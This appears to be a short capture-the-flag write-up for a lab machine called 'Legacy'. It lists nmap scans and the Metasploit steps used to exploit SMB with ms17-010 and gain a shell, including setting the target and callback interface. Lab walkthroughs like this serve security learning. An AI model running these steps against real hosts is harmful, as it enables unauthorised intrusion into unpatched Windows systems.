Legacy
Port Scanning and General Enumeration (Nmap)
My initial all ports scan showed 139, 445 and 3389 open. So I targeted those in my targets scan.
nmap -p 139,445,3389 -oN targeted -Pn -T4 -A 10.10.10.4
Also ran a script scan using the --script=vuln switch:
nmap -Pn 10.10.10.4 -p 139,445 --script=vuln
Interesting…
Access (Metasploit, ms17-010)
Let’s follow up on the ms17-010 lead from nmap using Metasploit.
msfconsole
search ms17-010
Set your options:
set rhosts 10.10.10.4
set lhost tun0
Fire!
That was easy. Capture the flags.